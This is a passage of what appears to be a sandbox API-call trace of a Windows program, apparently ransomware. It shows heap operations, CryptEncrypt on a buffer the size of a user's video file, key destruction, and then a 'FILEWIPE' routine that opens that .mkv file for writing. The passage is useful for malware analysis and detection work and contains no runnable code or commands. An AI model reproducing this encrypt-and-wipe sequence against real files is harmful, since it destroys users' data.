returned 0x9c2678 [0192.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0192.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0192.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0192.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0192.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0192.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0192.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0192.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0192.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0192.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0192.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0192.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0192.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0192.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0192.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0192.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0192.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0192.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0192.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0192.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0192.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0192.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0192.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0192.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0192.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0192.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0192.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0192.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0192.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0192.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0192.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0192.567] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0192.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0192.567] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c27d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0192.567] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.567] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.575] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0192.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0192.576] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.576] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0192.576] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.576] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.576] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.576] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0192.576] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.576] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0192.576] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0192.577] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.577] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1227e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x12280) returned 1 [0192.577] CharLowerBuffW (in: lpsz="byte[74369]", cchLength=0xb | out: lpsz="byte[74369]") returned 0xb [0192.578] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.578] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.578] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa71290*, pdwDataLen=0x87e820*=0x1227e, dwBufLen=0x12280 | out: pbData=0xa71290*, pdwDataLen=0x87e820*=0x12280) returned 1 [0192.579] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0192.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.579] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.579] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.589] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0192.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.590] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0192.590] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.590] CryptDestroyKey (hKey=0x90af98) returned 1 [0192.591] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0192.591] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0192.591] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0192.591] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0192.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.591] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.591] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.592] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.592] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0192.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.592] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.592] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0192.592] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.592] FreeLibrary (hLibModule=0x74f20000) returned 1 [0192.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0192.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0192.593] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0192.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0192.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.593] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687dfa70, ftCreationTime.dwHighDateTime=0x1d5e7ae, ftLastAccessTime.dwLowDateTime=0xdc4fcb20, ftLastAccessTime.dwHighDateTime=0x1d5e3aa, ftLastWriteTime.dwLowDateTime=0xdc4fcb20, ftLastWriteTime.dwHighDateTime=0x1d5e3aa, nFileSizeHigh=0x0, nFileSizeLow=0x1227e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="7999fJY.mkv", cAlternateFileName="")) returned 0x90ae18 [0192.593] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0192.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0192.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0192.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0192.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.594] CharLowerBuffW (in: lpsz="byte[74366]", cchLength=0xb | out: lpsz="byte[74366]") returned 0xb [0192.594] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0192.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0192.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.594] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0192.594] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0192.594] FreeLibrary (hLibModule=0x75c90000) returned 1 [0192.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0192.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0192.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0192.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.596] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0192.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0192.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.596] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0192.596] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.596] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf\\7999fjy.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0192.596] FreeLibrary (hLibModule=0x75990000) returned 